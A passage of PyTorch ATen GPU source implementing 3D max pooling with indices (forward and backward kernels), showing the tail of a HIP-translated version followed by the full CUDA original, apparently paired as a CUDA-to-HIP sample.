int pH, int pW, int dilationT, int dilationH, int dilationW, int offsetZ) { int oColumn = blockIdx.x * blockDim.x + threadIdx.x; int oRow = blockIdx.y * blockDim.y + threadIdx.y; int oFrame = (blockIdx.z + offsetZ) % output.size(1); // output frame/time int slice = (blockIdx.z + offsetZ) / output.size(1); // output slice/feature if (oRow < output.size(2) && oColumn < output.size(3)) { int tStart = oFrame * dT - pT; int hStart = oRow * dH - pH; int wStart = oColumn * dW - pW; int tEnd = min(tStart + (kT - 1) * dilationT + 1, itime); int hEnd = min(hStart + (kH - 1) * dilationH + 1, iheight); int wEnd = min(wStart + (KERNEL_WIDTH - 1) * dilationW + 1, iwidth); while(tStart < 0) tStart += dilationT; while(hStart < 0) hStart += dilationH; while(wStart < 0) wStart += dilationW; int index = 0; int maxIndex = -1; scalar_t max = THCNumerics<scalar_t>::min(); for (int t = tStart; t < tEnd; t += dilationT) { for (int h = hStart; h < hEnd; h += dilationH) { for (int w = wStart; w < wEnd; w += dilationW) { index = t * iheight * iwidth + h * iwidth + w; scalar_t val = inputData[slice * itime * iheight * iwidth + index]; if (max < val) { max = val; maxIndex = index; } } } } output[slice][oFrame][oRow][oColumn] = max; indices[slice][oFrame][oRow][oColumn] = maxIndex; } } #define UPDATE_OUTPUT_KERNEL_WIDTH(KW) case KW: \ hipLaunchKernelGGL(( max_pool3d_with_indices_single_out_frame<KW>) \ , dim3(grid), dim3(block), 0, at::hip::getCurrentHIPStreamMasqueradingAsCUDA(), \ input_data, \ output.packed_accessor<scalar_t, 4>(), \ indices.packed_accessor<int64_t, 4>(), \ itime, iheight, iwidth, \ kT, kH, \ dT, dH, dW, \ pT, pH, pW, \ dilationT, dilationH, dilationW, offsetZ); \ break template <typename scalar_t> void max_pool3d_with_indices_out_frame( scalar_t* input_data, const Tensor& output, const Tensor& indices, int totalZ, int itime, int iheight, int iwidth, int otime, int oheight, int owidth, int kT, int kH, int kW, int dT, int dH, int dW, int pT, int pH, int pW, int dilationT, int dilationH, int dilationW) { int offsetZ = 0; dim3 block(32, 8); while (totalZ > 0) { dim3 grid(cuda::ATenCeilDiv(owidth, static_cast<int>(block.x)), cuda::ATenCeilDiv(oheight, static_cast<int>(block.y)), totalZ > 65535 ? 65535 : totalZ); switch (kW) { UPDATE_OUTPUT_KERNEL_WIDTH(1); UPDATE_OUTPUT_KERNEL_WIDTH(2); UPDATE_OUTPUT_KERNEL_WIDTH(3); UPDATE_OUTPUT_KERNEL_WIDTH(4); UPDATE_OUTPUT_KERNEL_WIDTH(5); UPDATE_OUTPUT_KERNEL_WIDTH(6); UPDATE_OUTPUT_KERNEL_WIDTH(7); default: hipLaunchKernelGGL(( max_pool3d_with_indices_single_out_frame) , dim3(grid), dim3(block), 0, at::hip::getCurrentHIPStreamMasqueradingAsCUDA(), input_data, output.packed_accessor<scalar_t, 4>(), indices.packed_accessor<int64_t, 4>(), itime, iheight, iwidth, kT, kH, kW, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW, offsetZ); } TORCH_CHECK(hipGetLastError() == hipSuccess, "max_pool3d_backward_out_cuda_frame failed with error code ", hipGetLastError()); totalZ -= 65535; offsetZ += 65535; } } #undef UPDATE_OUTPUT_KERNEL_WIDTH template <typename scalar_t> __global__ static void max_pool3d_with_indices_backward_single_out_frame( scalar_t *gradInputData, PackedTensorAccessor<scalar_t, 4> gradOutput, PackedTensorAccessor<int64_t, 4> indices, int itime, int iheight, int iwidth, int dT, int dH, int dW, int pT, int pH, int pW, int dilationT, int dilationH, int dilationW, int offsetZ) { int oColumn = blockIdx.x * blockDim.x + threadIdx.x; int oRow = blockIdx.y * blockDim.y + threadIdx.y; int oFrame = (blockIdx.z + offsetZ) % gradOutput.size(1); // output frame/time int slice = (blockIdx.z + offsetZ) / gradOutput.size(1); // output slice/feature if (oRow < gradOutput.size(2) && oColumn < gradOutput.size(3)) { int maxIndex = indices[slice][oFrame][oRow][oColumn]; if (maxIndex != -1) { atomicAdd(&gradInputData[slice * itime * iheight * iwidth + maxIndex], gradOutput[slice][oFrame][oRow][oColumn]); } } } template <typename scalar_t> void max_pool3d_with_indices_backward_out_frame( scalar_t *gradInputData, const Tensor& gradOutput, const Tensor& indices, int64_t totalZ, int itime, int iheight, int iwidth, int oheight, int owidth, int dT, int dH, int dW, int pT, int pH, int pW, int dilationT, int dilationH, int dilationW) { int offsetZ = 0; dim3 block(32, 8); while (totalZ > 0) { dim3 grid(cuda::ATenCeilDiv(owidth, static_cast<int>(block.x)), cuda::ATenCeilDiv(oheight, static_cast<int>(block.y)), totalZ > 65535 ? 65535 : totalZ); hipLaunchKernelGGL(( max_pool3d_with_indices_backward_single_out_frame) , dim3(grid), dim3(block), 0, at::hip::getCurrentHIPStreamMasqueradingAsCUDA(), gradInputData, gradOutput.packed_accessor<scalar_t, 4>(), indices.packed_accessor<int64_t, 4>(), itime, iheight, iwidth, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW, offsetZ); TORCH_CHECK(hipGetLastError() == hipSuccess, "max_pool3d_with_indices_backward_out_frame failed with error code ", hipGetLastError()); totalZ -= 65535; offsetZ += 65535; } } void max_pool3d_with_indices_out_cuda_template( Tensor& output, Tensor& indices, const Tensor& input, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode) { TensorArg output_arg{ output, "output", 1 }; TensorArg indices_arg{ indices, "indices", 2 }; TensorArg input_arg{ input, "input", 3 }; checkAllSameGPU("max_pool3d_with_indices_out_cuda", {output_arg, indices_arg, input_arg}); // #20866, #22032: Guarantee this for the official C++ API? TORCH_CHECK((kernel_size.size() == 1 || kernel_size.size() == 3) && (stride.empty() || stride.size() == 3) && (padding.size() == 1 || padding.size() == 3) && (dilation.size() == 1 || dilation.size() == 3), "max_pool3d_with_indices: internal error: all IntArrayRef sizes must be 3"); TORCH_CHECK((input.ndimension() == 4 || input.ndimension() == 5), "non-empty 4D or 5D (batch mode) tensor expected for input"); const int kT = safe_downcast<int, int64_t>(kernel_size[0]); const int kH = kernel_size.size() == 1 ? kT : safe_downcast<int, int64_t>(kernel_size[1]); const int kW = kernel_size.size() == 1 ? kT : safe_downcast<int, int64_t>(kernel_size[2]); const int dT = stride.empty() ? kT : safe_downcast<int, int64_t>(stride[0]); const int dH = stride.empty() ? kH : safe_downcast<int, int64_t>(stride[1]); const int dW = stride.empty() ? kW : safe_downcast<int, int64_t>(stride[2]); const int pT = safe_downcast<int, int64_t>(padding[0]); const int pH = padding.size() == 1 ? pT : safe_downcast<int, int64_t>(padding[1]); const int pW = padding.size() == 1 ? pT : safe_downcast<int, int64_t>(padding[2]); const int dilationT = safe_downcast<int, int64_t>(dilation[0]); const int dilationH = dilation.size() == 1 ? dilationT : safe_downcast<int, int64_t>(dilation[1]); const int dilationW = dilation.size() == 1 ? dilationT : safe_downcast<int, int64_t>(dilation[2]); const int64_t nbatch = input.ndimension() == 5 ? input.size(-5) : 1; const int64_t nslices = input.size(-4); const int64_t itime = input.size(-3); const int64_t iheight = input.size(-2); const int64_t iwidth = input.size(-1); const int64_t otime = pooling_output_shape<int64_t>(itime, kT, pT, dT, dilationT, ceil_mode); const int64_t oheight = pooling_output_shape<int64_t>(iheight, kH, pH, dH, dilationH, ceil_mode); const int64_t owidth = pooling_output_shape<int64_t>(iwidth, kW, pW, dW, dilationW, ceil_mode); pool3d_shape_check( input, nslices, kT, kH, kW, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW, itime, iheight, iwidth, otime, oheight, owidth); if (input.ndimension() == 4) { output.resize_({ nslices, otime, oheight, owidth}); indices.resize_({nslices, otime, oheight, owidth}); } else { output.resize_({nbatch, nslices, otime, oheight, owidth}); indices.resize_({nbatch, nslices, otime, oheight, owidth}); } Tensor work_input = input.contiguous(); Tensor work_output = output; Tensor work_indices = indices; if (input.ndimension() == 5) { // Collapse batch and feature dimensions. work_input = work_input.reshape({nbatch * nslices, itime, iheight, iwidth}); work_output = work_output.reshape({nbatch * nslices, otime, oheight, owidth}); work_indices = work_indices.reshape({nbatch * nslices, otime, oheight, owidth}); } AT_DISPATCH_FLOATING_TYPES_AND_HALF( input.scalar_type(), "max_pool3d_with_indices_out_frame", [&]{ scalar_t *input_data = work_input.data<scalar_t>(); int64_t totalZ = otime * nslices * nbatch; max_pool3d_with_indices_out_frame( input_data, work_output, work_indices, totalZ, itime, iheight, iwidth, otime, oheight, owidth, kT, kH, kW, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW); } ); } void max_pool3d_with_indices_backward_out_cuda_template( Tensor& gradInput, const Tensor& gradOutput, const Tensor& input, const Tensor& indices, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode) { TensorArg gradInput_arg{ gradInput, "gradInput", 1 }; TensorArg gradOutput_arg{ gradOutput, "gradOutput", 2 }; TensorArg input_arg{ input, "input", 3 }; TensorArg indices_arg{ indices, "indices", 4 }; checkAllSameGPU("max_pool3d_with_indices_backward_out_cuda", {gradInput_arg, gradOutput_arg, input_arg, indices_arg}); // #20866, #22032: Guarantee this for the official C++ API? TORCH_CHECK((kernel_size.size() == 1 || kernel_size.size() == 3) && (stride.empty() || stride.size() == 3) && (padding.size() == 1 || padding.size() == 3) && (dilation.size() == 1 || dilation.size() == 3), "max_pool3d_with_indices: internal error: all IntArrayRef sizes must be 3"); TORCH_CHECK((input.ndimension() == 4 || input.ndimension() == 5), "non-empty 4D or 5D (batch mode) tensor expected for input"); TORCH_CHECK((gradOutput.ndimension() == 4 || gradOutput.ndimension() == 5), "non-empty 4D or 5D (batch mode) tensor expected for gradOutput"); // Resize and initialize result tensor. gradInput.resize_as_(input); gradInput.zero_(); const int kT = safe_downcast<int, int64_t>(kernel_size[0]); const int kH = kernel_size.size() == 1 ? kT : safe_downcast<int, int64_t>(kernel_size[1]); const int kW = kernel_size.size() == 1 ? kT : safe_downcast<int, int64_t>(kernel_size[2]); const int dT = stride.empty() ? kT : safe_downcast<int, int64_t>(stride[0]); const int dH = stride.empty() ? kH : safe_downcast<int, int64_t>(stride[1]); const int dW = stride.empty() ? kW : safe_downcast<int, int64_t>(stride[2]); const int pT = safe_downcast<int, int64_t>(padding[0]); const int pH = padding.size() == 1 ? pT : safe_downcast<int, int64_t>(padding[1]); const int pW = padding.size() == 1 ? pT : safe_downcast<int, int64_t>(padding[2]); const int dilationT = safe_downcast<int, int64_t>(dilation[0]); const int dilationH = dilation.size() == 1 ? dilationT : safe_downcast<int, int64_t>(dilation[1]); const int dilationW = dilation.size() == 1 ? dilationT : safe_downcast<int, int64_t>(dilation[2]); const int64_t nbatch = input.ndimension() == 5 ? input.size(-5) : 1; const int64_t nslices = input.size(-4); const int64_t otime = gradOutput.size(-3); const int64_t oheight = gradOutput.size(-2); const int64_t owidth = gradOutput.size(-1); const int64_t itime = gradInput.size(-3); const int64_t iheight = gradInput.size(-2); const int64_t iwidth = gradInput.size(-1); max_pool3d_backward_shape_check( input, gradOutput, indices, nslices, kT, kH, kW, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW, itime, iheight, iwidth, otime, oheight, owidth); Tensor work_grad_input = gradInput; Tensor work_grad_output = gradOutput.contiguous(); Tensor work_indices = indices.contiguous(); if (input.ndimension() == 5) { // Collapse batch and feature dimensions. work_grad_input = work_grad_input.reshape({nbatch * nslices, itime, iheight, iwidth}); work_grad_output = work_grad_output.reshape({nbatch * nslices, otime, oheight, owidth}); work_indices = work_indices.reshape({nbatch * nslices, otime, oheight, owidth}); } AT_DISPATCH_FLOATING_TYPES_AND_HALF(input.scalar_type(), "max_pool3d_with_indices_backward_out_frame", [&] { const int64_t totalZ = otime * nslices * nbatch; scalar_t *grad_input_data = work_grad_input.data<scalar_t>(); max_pool3d_with_indices_backward_out_frame( grad_input_data, work_grad_output, work_indices, totalZ, itime, iheight, iwidth, owidth, oheight, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW); } ); } } // namespace std::tuple<Tensor&, Tensor&> max_pool3d_with_indices_out_cuda( Tensor& output, Tensor& indices, const Tensor& input, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode) { max_pool3d_with_indices_out_cuda_template( output, indices, input, kernel_size, stride, padding, dilation, ceil_mode); return std::tuple<Tensor&, Tensor&>(output, indices); } std::tuple<Tensor, Tensor> max_pool3d_with_indices_cuda( const Tensor& input, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode) { Tensor output = at::empty({0}, input.options()); Tensor indices = at::empty({0}, input.options().dtype(kLong)); max_pool3d_with_indices_out_cuda_template( output, indices, input, kernel_size, stride, padding, dilation, ceil_mode); return std::tuple<Tensor, Tensor>(output, indices); } Tensor& max_pool3d_with_indices_backward_out_cuda( Tensor& gradInput, const Tensor& gradOutput, const Tensor& input, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode, const Tensor& indices) { max_pool3d_with_indices_backward_out_cuda_template( gradInput, gradOutput, input, indices, kernel_size, stride, padding, dilation, ceil_mode); return gradInput; } Tensor max_pool3d_with_indices_backward_cuda( const Tensor& gradOutput, const Tensor& input, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode, const Tensor& indices) { auto gradInput = at::zeros_like(input); max_pool3d_with_indices_backward_out_cuda_template( gradInput, gradOutput, input, indices, kernel_size, stride, padding, dilation, ceil_mode); return gradInput; } } // at::native } // at
67cb304db55720a9860557b8661f98c913ccede3.cu
#include <ATen/AccumulateType.h> #include <ATen/native/Pool.h> #include <ATen/cuda/CUDAContext.h> #include <ATen/cuda/CUDAApplyUtils.cuh> #include <ATen/cuda/detail/TensorInfo.cuh> #include <ATen/cuda/detail/IndexUtils.cuh> #include <ATen/cuda/detail/KernelUtils.h> #include <THC/THCNumerics.cuh> #include <c10/macros/Macros.h> namespace at { namespace native { namespace { __device__ inline int min(int a, int b) { return a <= b ? a : b; } template <typename scalar_t> __global__ static void max_pool3d_with_indices_single_out_frame( scalar_t* inputData, PackedTensorAccessor<scalar_t, 4> output, PackedTensorAccessor<int64_t, 4> indices, int itime, int iheight, int iwidth, int kT, int kH, int kW, int dT, int dH, int dW, int pT, int pH, int pW, int dilationT, int dilationH, int dilationW, int offsetZ) { int oColumn = blockIdx.x * blockDim.x + threadIdx.x; int oRow = blockIdx.y * blockDim.y + threadIdx.y; int oFrame = (blockIdx.z + offsetZ) % output.size(1); // output frame/time int slice = (blockIdx.z + offsetZ) / output.size(1); // output slice/feature if (oRow < output.size(2) && oColumn < output.size(3)) { int tStart = oFrame * dT - pT; int hStart = oRow * dH - pH; int wStart = oColumn * dW - pW; int tEnd = min(tStart + (kT - 1) * dilationT + 1, itime); int hEnd = min(hStart + (kH - 1) * dilationH + 1, iheight); int wEnd = min(wStart + (kW - 1) * dilationW + 1, iwidth); while(tStart < 0) tStart += dilationT; while(hStart < 0) hStart += dilationH; while(wStart < 0) wStart += dilationW; int index = 0; int maxIndex = -1; inputData += slice * itime * iheight * iwidth; scalar_t max = THCNumerics<scalar_t>::min(); for (int t = tStart; t < tEnd; t += dilationT) { for (int h = hStart; h < hEnd; h += dilationH) { for (int w = wStart; w < wEnd; w += dilationW) { index = t * iheight * iwidth + h * iwidth + w; scalar_t val = inputData[index]; if ((max < val) || THCNumerics<scalar_t>::isnan(val)) { max = val; maxIndex = index; } } } } output[slice][oFrame][oRow][oColumn] = max; indices[slice][oFrame][oRow][oColumn] = maxIndex; } } template <int KERNEL_WIDTH, typename scalar_t> __global__ static void max_pool3d_with_indices_single_out_frame( scalar_t* inputData, PackedTensorAccessor<scalar_t, 4> output, PackedTensorAccessor<int64_t, 4> indices, int itime, int iheight, int iwidth, int kT, int kH, int dT, int dH, int dW, int pT, int pH, int pW, int dilationT, int dilationH, int dilationW, int offsetZ) { int oColumn = blockIdx.x * blockDim.x + threadIdx.x; int oRow = blockIdx.y * blockDim.y + threadIdx.y; int oFrame = (blockIdx.z + offsetZ) % output.size(1); // output frame/time int slice = (blockIdx.z + offsetZ) / output.size(1); // output slice/feature if (oRow < output.size(2) && oColumn < output.size(3)) { int tStart = oFrame * dT - pT; int hStart = oRow * dH - pH; int wStart = oColumn * dW - pW; int tEnd = min(tStart + (kT - 1) * dilationT + 1, itime); int hEnd = min(hStart + (kH - 1) * dilationH + 1, iheight); int wEnd = min(wStart + (KERNEL_WIDTH - 1) * dilationW + 1, iwidth); while(tStart < 0) tStart += dilationT; while(hStart < 0) hStart += dilationH; while(wStart < 0) wStart += dilationW; int index = 0; int maxIndex = -1; scalar_t max = THCNumerics<scalar_t>::min(); for (int t = tStart; t < tEnd; t += dilationT) { for (int h = hStart; h < hEnd; h += dilationH) { for (int w = wStart; w < wEnd; w += dilationW) { index = t * iheight * iwidth + h * iwidth + w; scalar_t val = inputData[slice * itime * iheight * iwidth + index]; if (max < val) { max = val; maxIndex = index; } } } } output[slice][oFrame][oRow][oColumn] = max; indices[slice][oFrame][oRow][oColumn] = maxIndex; } } #define UPDATE_OUTPUT_KERNEL_WIDTH(KW) case KW: \ max_pool3d_with_indices_single_out_frame<KW> \ <<<grid, block, 0, at::cuda::getCurrentCUDAStream()>>>( \ input_data, \ output.packed_accessor<scalar_t, 4>(), \ indices.packed_accessor<int64_t, 4>(), \ itime, iheight, iwidth, \ kT, kH, \ dT, dH, dW, \ pT, pH, pW, \ dilationT, dilationH, dilationW, offsetZ); \ break template <typename scalar_t> void max_pool3d_with_indices_out_frame( scalar_t* input_data, const Tensor& output, const Tensor& indices, int totalZ, int itime, int iheight, int iwidth, int otime, int oheight, int owidth, int kT, int kH, int kW, int dT, int dH, int dW, int pT, int pH, int pW, int dilationT, int dilationH, int dilationW) { int offsetZ = 0; dim3 block(32, 8); while (totalZ > 0) { dim3 grid(cuda::ATenCeilDiv(owidth, static_cast<int>(block.x)), cuda::ATenCeilDiv(oheight, static_cast<int>(block.y)), totalZ > 65535 ? 65535 : totalZ); switch (kW) { UPDATE_OUTPUT_KERNEL_WIDTH(1); UPDATE_OUTPUT_KERNEL_WIDTH(2); UPDATE_OUTPUT_KERNEL_WIDTH(3); UPDATE_OUTPUT_KERNEL_WIDTH(4); UPDATE_OUTPUT_KERNEL_WIDTH(5); UPDATE_OUTPUT_KERNEL_WIDTH(6); UPDATE_OUTPUT_KERNEL_WIDTH(7); default: max_pool3d_with_indices_single_out_frame <<<grid, block, 0, at::cuda::getCurrentCUDAStream()>>>( input_data, output.packed_accessor<scalar_t, 4>(), indices.packed_accessor<int64_t, 4>(), itime, iheight, iwidth, kT, kH, kW, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW, offsetZ); } TORCH_CHECK(cudaGetLastError() == cudaSuccess, "max_pool3d_backward_out_cuda_frame failed with error code ", cudaGetLastError()); totalZ -= 65535; offsetZ += 65535; } } #undef UPDATE_OUTPUT_KERNEL_WIDTH template <typename scalar_t> __global__ static void max_pool3d_with_indices_backward_single_out_frame( scalar_t *gradInputData, PackedTensorAccessor<scalar_t, 4> gradOutput, PackedTensorAccessor<int64_t, 4> indices, int itime, int iheight, int iwidth, int dT, int dH, int dW, int pT, int pH, int pW, int dilationT, int dilationH, int dilationW, int offsetZ) { int oColumn = blockIdx.x * blockDim.x + threadIdx.x; int oRow = blockIdx.y * blockDim.y + threadIdx.y; int oFrame = (blockIdx.z + offsetZ) % gradOutput.size(1); // output frame/time int slice = (blockIdx.z + offsetZ) / gradOutput.size(1); // output slice/feature if (oRow < gradOutput.size(2) && oColumn < gradOutput.size(3)) { int maxIndex = indices[slice][oFrame][oRow][oColumn]; if (maxIndex != -1) { atomicAdd(&gradInputData[slice * itime * iheight * iwidth + maxIndex], gradOutput[slice][oFrame][oRow][oColumn]); } } } template <typename scalar_t> void max_pool3d_with_indices_backward_out_frame( scalar_t *gradInputData, const Tensor& gradOutput, const Tensor& indices, int64_t totalZ, int itime, int iheight, int iwidth, int oheight, int owidth, int dT, int dH, int dW, int pT, int pH, int pW, int dilationT, int dilationH, int dilationW) { int offsetZ = 0; dim3 block(32, 8); while (totalZ > 0) { dim3 grid(cuda::ATenCeilDiv(owidth, static_cast<int>(block.x)), cuda::ATenCeilDiv(oheight, static_cast<int>(block.y)), totalZ > 65535 ? 65535 : totalZ); max_pool3d_with_indices_backward_single_out_frame <<<grid, block, 0, at::cuda::getCurrentCUDAStream()>>>( gradInputData, gradOutput.packed_accessor<scalar_t, 4>(), indices.packed_accessor<int64_t, 4>(), itime, iheight, iwidth, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW, offsetZ); TORCH_CHECK(cudaGetLastError() == cudaSuccess, "max_pool3d_with_indices_backward_out_frame failed with error code ", cudaGetLastError()); totalZ -= 65535; offsetZ += 65535; } } void max_pool3d_with_indices_out_cuda_template( Tensor& output, Tensor& indices, const Tensor& input, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode) { TensorArg output_arg{ output, "output", 1 }; TensorArg indices_arg{ indices, "indices", 2 }; TensorArg input_arg{ input, "input", 3 }; checkAllSameGPU("max_pool3d_with_indices_out_cuda", {output_arg, indices_arg, input_arg}); // #20866, #22032: Guarantee this for the official C++ API? TORCH_CHECK((kernel_size.size() == 1 || kernel_size.size() == 3) && (stride.empty() || stride.size() == 3) && (padding.size() == 1 || padding.size() == 3) && (dilation.size() == 1 || dilation.size() == 3), "max_pool3d_with_indices: internal error: all IntArrayRef sizes must be 3"); TORCH_CHECK((input.ndimension() == 4 || input.ndimension() == 5), "non-empty 4D or 5D (batch mode) tensor expected for input"); const int kT = safe_downcast<int, int64_t>(kernel_size[0]); const int kH = kernel_size.size() == 1 ? kT : safe_downcast<int, int64_t>(kernel_size[1]); const int kW = kernel_size.size() == 1 ? kT : safe_downcast<int, int64_t>(kernel_size[2]); const int dT = stride.empty() ? kT : safe_downcast<int, int64_t>(stride[0]); const int dH = stride.empty() ? kH : safe_downcast<int, int64_t>(stride[1]); const int dW = stride.empty() ? kW : safe_downcast<int, int64_t>(stride[2]); const int pT = safe_downcast<int, int64_t>(padding[0]); const int pH = padding.size() == 1 ? pT : safe_downcast<int, int64_t>(padding[1]); const int pW = padding.size() == 1 ? pT : safe_downcast<int, int64_t>(padding[2]); const int dilationT = safe_downcast<int, int64_t>(dilation[0]); const int dilationH = dilation.size() == 1 ? dilationT : safe_downcast<int, int64_t>(dilation[1]); const int dilationW = dilation.size() == 1 ? dilationT : safe_downcast<int, int64_t>(dilation[2]); const int64_t nbatch = input.ndimension() == 5 ? input.size(-5) : 1; const int64_t nslices = input.size(-4); const int64_t itime = input.size(-3); const int64_t iheight = input.size(-2); const int64_t iwidth = input.size(-1); const int64_t otime = pooling_output_shape<int64_t>(itime, kT, pT, dT, dilationT, ceil_mode); const int64_t oheight = pooling_output_shape<int64_t>(iheight, kH, pH, dH, dilationH, ceil_mode); const int64_t owidth = pooling_output_shape<int64_t>(iwidth, kW, pW, dW, dilationW, ceil_mode); pool3d_shape_check( input, nslices, kT, kH, kW, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW, itime, iheight, iwidth, otime, oheight, owidth); if (input.ndimension() == 4) { output.resize_({ nslices, otime, oheight, owidth}); indices.resize_({nslices, otime, oheight, owidth}); } else { output.resize_({nbatch, nslices, otime, oheight, owidth}); indices.resize_({nbatch, nslices, otime, oheight, owidth}); } Tensor work_input = input.contiguous(); Tensor work_output = output; Tensor work_indices = indices; if (input.ndimension() == 5) { // Collapse batch and feature dimensions. work_input = work_input.reshape({nbatch * nslices, itime, iheight, iwidth}); work_output = work_output.reshape({nbatch * nslices, otime, oheight, owidth}); work_indices = work_indices.reshape({nbatch * nslices, otime, oheight, owidth}); } AT_DISPATCH_FLOATING_TYPES_AND_HALF( input.scalar_type(), "max_pool3d_with_indices_out_frame", [&]{ scalar_t *input_data = work_input.data<scalar_t>(); int64_t totalZ = otime * nslices * nbatch; max_pool3d_with_indices_out_frame( input_data, work_output, work_indices, totalZ, itime, iheight, iwidth, otime, oheight, owidth, kT, kH, kW, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW); } ); } void max_pool3d_with_indices_backward_out_cuda_template( Tensor& gradInput, const Tensor& gradOutput, const Tensor& input, const Tensor& indices, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode) { TensorArg gradInput_arg{ gradInput, "gradInput", 1 }; TensorArg gradOutput_arg{ gradOutput, "gradOutput", 2 }; TensorArg input_arg{ input, "input", 3 }; TensorArg indices_arg{ indices, "indices", 4 }; checkAllSameGPU("max_pool3d_with_indices_backward_out_cuda", {gradInput_arg, gradOutput_arg, input_arg, indices_arg}); // #20866, #22032: Guarantee this for the official C++ API? TORCH_CHECK((kernel_size.size() == 1 || kernel_size.size() == 3) && (stride.empty() || stride.size() == 3) && (padding.size() == 1 || padding.size() == 3) && (dilation.size() == 1 || dilation.size() == 3), "max_pool3d_with_indices: internal error: all IntArrayRef sizes must be 3"); TORCH_CHECK((input.ndimension() == 4 || input.ndimension() == 5), "non-empty 4D or 5D (batch mode) tensor expected for input"); TORCH_CHECK((gradOutput.ndimension() == 4 || gradOutput.ndimension() == 5), "non-empty 4D or 5D (batch mode) tensor expected for gradOutput"); // Resize and initialize result tensor. gradInput.resize_as_(input); gradInput.zero_(); const int kT = safe_downcast<int, int64_t>(kernel_size[0]); const int kH = kernel_size.size() == 1 ? kT : safe_downcast<int, int64_t>(kernel_size[1]); const int kW = kernel_size.size() == 1 ? kT : safe_downcast<int, int64_t>(kernel_size[2]); const int dT = stride.empty() ? kT : safe_downcast<int, int64_t>(stride[0]); const int dH = stride.empty() ? kH : safe_downcast<int, int64_t>(stride[1]); const int dW = stride.empty() ? kW : safe_downcast<int, int64_t>(stride[2]); const int pT = safe_downcast<int, int64_t>(padding[0]); const int pH = padding.size() == 1 ? pT : safe_downcast<int, int64_t>(padding[1]); const int pW = padding.size() == 1 ? pT : safe_downcast<int, int64_t>(padding[2]); const int dilationT = safe_downcast<int, int64_t>(dilation[0]); const int dilationH = dilation.size() == 1 ? dilationT : safe_downcast<int, int64_t>(dilation[1]); const int dilationW = dilation.size() == 1 ? dilationT : safe_downcast<int, int64_t>(dilation[2]); const int64_t nbatch = input.ndimension() == 5 ? input.size(-5) : 1; const int64_t nslices = input.size(-4); const int64_t otime = gradOutput.size(-3); const int64_t oheight = gradOutput.size(-2); const int64_t owidth = gradOutput.size(-1); const int64_t itime = gradInput.size(-3); const int64_t iheight = gradInput.size(-2); const int64_t iwidth = gradInput.size(-1); max_pool3d_backward_shape_check( input, gradOutput, indices, nslices, kT, kH, kW, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW, itime, iheight, iwidth, otime, oheight, owidth); Tensor work_grad_input = gradInput; Tensor work_grad_output = gradOutput.contiguous(); Tensor work_indices = indices.contiguous(); if (input.ndimension() == 5) { // Collapse batch and feature dimensions. work_grad_input = work_grad_input.reshape({nbatch * nslices, itime, iheight, iwidth}); work_grad_output = work_grad_output.reshape({nbatch * nslices, otime, oheight, owidth}); work_indices = work_indices.reshape({nbatch * nslices, otime, oheight, owidth}); } AT_DISPATCH_FLOATING_TYPES_AND_HALF(input.scalar_type(), "max_pool3d_with_indices_backward_out_frame", [&] { const int64_t totalZ = otime * nslices * nbatch; scalar_t *grad_input_data = work_grad_input.data<scalar_t>(); max_pool3d_with_indices_backward_out_frame( grad_input_data, work_grad_output, work_indices, totalZ, itime, iheight, iwidth, owidth, oheight, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW); } ); } } // namespace std::tuple<Tensor&, Tensor&> max_pool3d_with_indices_out_cuda( Tensor& output, Tensor& indices, const Tensor& input, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode) { max_pool3d_with_indices_out_cuda_template( output, indices, input, kernel_size, stride, padding, dilation, ceil_mode); return std::tuple<Tensor&, Tensor&>(output, indices); } std::tuple<Tensor, Tensor> max_pool3d_with_indices_cuda( const Tensor& input, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode) { Tensor output = at::empty({0}, input.options()); Tensor indices = at::empty({0}, input.options().dtype(kLong)); max_pool3d_with_indices_out_cuda_template( output, indices, input, kernel_size, stride, padding, dilation, ceil_mode); return std::tuple<Tensor, Tensor>(output, indices); } Tensor& max_pool3d_with_indices_backward_out_cuda( Tensor& gradInput, const Tensor& gradOutput, const Tensor& input, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode, const Tensor& indices) { max_pool3d_with_indices_backward_out_cuda_template( gradInput, gradOutput, input, indices, kernel_size, stride, padding, dilation, ceil_mode); return gradInput; } Tensor max_pool3d_with_indices_backward_cuda( const Tensor& gradOutput, const Tensor& input, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode, const Tensor& indices) { auto gradInput = at::zeros_like(input); max_pool3d_with_indices_backward_out_cuda_template( gradInput, gradOutput, input, indices, kernel_size, stride, padding, dilation, ceil_mode); return gradInput; } } // at::native } // at
1da4ef47955d91f142a1299183b6514fc180728c.hip
